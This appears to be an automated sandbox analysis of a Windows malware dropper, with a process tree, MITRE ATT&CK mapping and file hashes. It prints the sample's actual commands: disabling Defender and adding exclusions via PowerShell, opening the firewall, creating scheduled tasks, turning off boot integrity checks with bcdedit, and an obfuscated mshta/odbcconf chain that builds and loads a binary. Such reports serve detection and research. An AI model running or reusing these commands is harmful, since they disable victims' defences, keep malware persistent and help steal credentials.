C:\Users\Admin\AppData\Local\Temp\e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe"C:\Users\Admin\AppData\Local\Temp\e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri006e94a111.exe4⤵
- Loads dropped DLL
PID:2924 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri006e94a111.exeFri006e94a111.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 2646⤵
- Program crash
PID:1772
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00aca824dcfa8.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00aca824dcfa8.exeFri00aca824dcfa8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1820 -
C:\Users\Admin\AppData\Local\Temp\is-5OBTQ.tmp\Fri00aca824dcfa8.tmp"C:\Users\Admin\AppData\Local\Temp\is-5OBTQ.tmp\Fri00aca824dcfa8.tmp" /SL5="$8022A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00aca824dcfa8.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:596 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00aca824dcfa8.exe"C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00aca824dcfa8.exe" /SILENT7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:376 -
C:\Users\Admin\AppData\Local\Temp\is-F1UHA.tmp\Fri00aca824dcfa8.tmp"C:\Users\Admin\AppData\Local\Temp\is-F1UHA.tmp\Fri00aca824dcfa8.tmp" /SL5="$3019A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00aca824dcfa8.exe" /SILENT8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2224
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri002d0eb8ad1c781.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2916 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri002d0eb8ad1c781.exeFri002d0eb8ad1c781.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1092 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 2726⤵
- Program crash
PID:2792
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0009837acb0e3f.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri0009837acb0e3f.exeFri0009837acb0e3f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00a6abc266a1e.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00a6abc266a1e.exeFri00a6abc266a1e.exe5⤵
- Executes dropped EXE
PID:532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri000511de73f4d6ca.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:468 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri000511de73f4d6ca.exeFri000511de73f4d6ca.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:1776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00ea564f2dd.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2764 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00ea564f2dd.exeFri00ea564f2dd.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0024e24e95c5.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2904 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri0024e24e95c5.exeFri0024e24e95c5.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2156 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
- System Location Discovery: System Language Discovery
PID:348 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri007f1a815cd.exe /mixtwo4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri007f1a815cd.exeFri007f1a815cd.exe /mixtwo5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:556 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 2646⤵
- Program crash
PID:2284
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00787d8fbee5ae2.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00787d8fbee5ae2.exeFri00787d8fbee5ae2.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri006106b9f3.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri006106b9f3.exeFri006106b9f3.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00d11173c6bdedf9.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2256 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00d11173c6bdedf9.exeFri00d11173c6bdedf9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2416 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00d11173c6bdedf9.exe"C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00d11173c6bdedf9.exe" -u6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1288
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri006955771d552.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri006955771d552.exeFri006955771d552.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri006955771d552.exe"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri006955771d552.exe"C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri006955771d552.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:828
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri009539f6ca3c9b1.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:760 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri009539f6ca3c9b1.exeFri009539f6ca3c9b1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:824 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=Fri009539f6ca3c9b1.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.06⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2644 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2644 CREDAT:275457 /prefetch:27⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1352
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2644 CREDAT:275461 /prefetch:27⤵
- System Location Discovery: System Language Discovery
PID:2620
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2644 CREDAT:209929 /prefetch:27⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1900
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri003da4b0a49fa71b6.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri003da4b0a49fa71b6.exeFri003da4b0a49fa71b6.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri003da4b0a49fa71b6.exe"C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri003da4b0a49fa71b6.exe"6⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:348 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:2924
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2304
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /306-3067⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1876 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Scheduled Task/Job: Scheduled Task
PID:2360
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f8⤵PID:1092
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"8⤵
- Executes dropped EXE
PID:2604 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER9⤵
- Modifies boot configuration data using bcdedit
PID:2400
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:9⤵
- Modifies boot configuration data using bcdedit
PID:1156
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:9⤵
- Modifies boot configuration data using bcdedit
PID:2740
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows9⤵
- Modifies boot configuration data using bcdedit
PID:1124
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe9⤵
- Modifies boot configuration data using bcdedit
PID:2608
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe9⤵
- Modifies boot configuration data using bcdedit
PID:1676
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 09⤵
- Modifies boot configuration data using bcdedit
PID:3028
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn9⤵
- Modifies boot configuration data using bcdedit
PID:1804
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 19⤵
- Modifies boot configuration data using bcdedit
PID:1336
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}9⤵
- Modifies boot configuration data using bcdedit
PID:2228
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast9⤵
- Modifies boot configuration data using bcdedit
PID:1048
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 09⤵
- Modifies boot configuration data using bcdedit
PID:1488
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}9⤵
- Modifies boot configuration data using bcdedit
PID:2944
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2200
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v8⤵
- Modifies boot configuration data using bcdedit
PID:292
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe8⤵PID:948
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Scheduled Task/Job: Scheduled Task
PID:2736
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00a70cad68c17.exe4⤵
- System Location Discovery: System Language Discovery
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00a70cad68c17.exeFri00a70cad68c17.exe5⤵
- Executes dropped EXE
PID:284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri007b242a25024db8.exe4⤵
- System Location Discovery: System Language Discovery
PID:2556 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri007b242a25024db8.exeFri007b242a25024db8.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri005fb51f7290280.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3016 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri005fb51f7290280.exeFri005fb51f7290280.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00c13dae83a537d.exe4⤵
- System Location Discovery: System Language Discovery
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00c13dae83a537d.exeFri00c13dae83a537d.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2176 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00c13dae83a537d.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00c13dae83a537d.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )6⤵
- System Location Discovery: System Language Discovery
PID:2228 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00c13dae83a537d.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS4FAFF456\Fri00c13dae83a537d.exe" ) do taskkill -f /Im "%~NXg"7⤵
- System Location Discovery: System Language Discovery
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXeQ7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2152 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )9⤵
- System Location Discovery: System Language Discovery
PID:2172 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"10⤵
- System Location Discovery: System Language Discovery
PID:1828
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )9⤵
- System Binary Proxy Execution: Odbcconf
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2624 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR © /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}10⤵
- System Binary Proxy Execution: Odbcconf
- System Location Discovery: System Language Discovery
PID:2860 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "11⤵
- System Location Discovery: System Language Discovery
PID:1420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"11⤵
- System Location Discovery: System Language Discovery
PID:1572
-
-
C:\Windows\SysWOW64\odbcconf.exeodbcconf.exe /a { reGSVr .\9v~4.Ku}11⤵
- System Binary Proxy Execution: Odbcconf
- System Location Discovery: System Language Discovery
PID:1828
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "Fri00c13dae83a537d.exe"8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
-
-
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241223222233.log C:\Windows\Logs\CBS\CbsPersist_20241223222233.cab1⤵
- Drops file in Windows directory
PID:1036
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:2924
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
5Subvert Trust Controls
1Install Root Certificate
1System Binary Proxy Execution
1Odbcconf
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
579B
MD5f55da450a5fb287e1e0f0dcc965756ca
SHA17e04de896a3e666d00e687d33ffad93be83d349e
SHA25631ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0
SHA51219bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6B2043001D270792DFFD725518EAFE2C
Filesize252B
MD5cfed85d6ffc0272e83ccd0a09349b119
SHA1505396962486f89d5964515fe2272128b2ba6e76
SHA256594a3e6d9f301b6c66a79bf59eddde3c27b02237b4ede2e4436ff2a737f03f79
SHA5126793e0db26949989de14fa48e44cfb036b802b384da0fb2a777711b86353b685953b96643fe9c3a0e3a5467076f8b130ec9fb90ffa2c2ffe75c7a007d9a743a0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5561dace14bc3058096c2d7ff328902d0
SHA14ae86e54495dbb15737ddebad1360437b0e40ae4
SHA2563713e6d7d8a793131bb10d16fd8b593630828720f2d187a85430b1478ecd3cfc
SHA512851f24fa39489c5ddfc308a3193e7985e1f4c249ac7865c44278ded49b8361079a7561a10876e98dcab07005ef21241731066e2f2f6c8974fefa203e35fa2be6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5958e4b6518417b3e74aad235203bfd47
SHA1cda4c2b6d10d73eb4090fe3c8f6eaa842a780554
SHA2564d6d0f8b19b99fbe60b854243b131a4af6167a7ffaa6b219e11ebbad8120b335
SHA512dc5d05283190ab0f949796b7f751c844ddbb45e6843694ea0de793ec90fd51faa3d105e1f32da8a85bc83e5fa5391d91ef6969bc25ca548e8b0dcaeb9032fe3a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c11ee0ce39da0b1143e179c07e1d4195
SHA112a56e1c085b8af99ae06a70b59704e26cdcf5ac
SHA256a4b3a792be8092ceff56d29850876c33c97bceb38b9e63b3b7da3369d36e1faa
SHA512c8d4cdcfdcabba6b252cdb2fb5af4a7cf0deeac99222c220313a8316fd4bc360d812c2a9f19fa5533c210b97b9a2ac3ed3d8b8b1f0924a5794b3f8a214bc14eb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD530923f5bac5a49ff729780d633db183a
SHA1c35a224e09331391eeb0e9f6a21be0f398b4eac3
SHA256cf85de6beec91b4b899d90d2bb4514d9ea91ceb9c73551369fe9d316f62065da
SHA512956d3382482e5add88712f81154b90ca52cd8af697f483788dd055f8201421dd83bd1dd2835b44c79a79f3f76c93b031ba24d61278871044b0886a493b91a19d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c92a847906f8e72b9541febea632c9cf
SHA15df3225384f717953bef1bd0403efe07a31aefb1
SHA256b9dfdf5dff2c5a1dbe05cbaffd62b20c209be2dc2752e4a6798a4ca5933d3d44
SHA51225a9d2303fbe8ea2335bc6404bd09f1a36a452589fbc72bab9acbeb111ee33de6333d5ec65a55ab89d064be5b21d387ab23d2ab981c2d2df271291fc127a56ae
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55fa4dd857d9c1983ae39a127d3572258
SHA1914cd248b065b3a2eae76831e22fd052dda7f608
SHA2563e2b0a9cde188dc9f0b17f341527aefe27829ef547e17ad93221cd91dcbef271
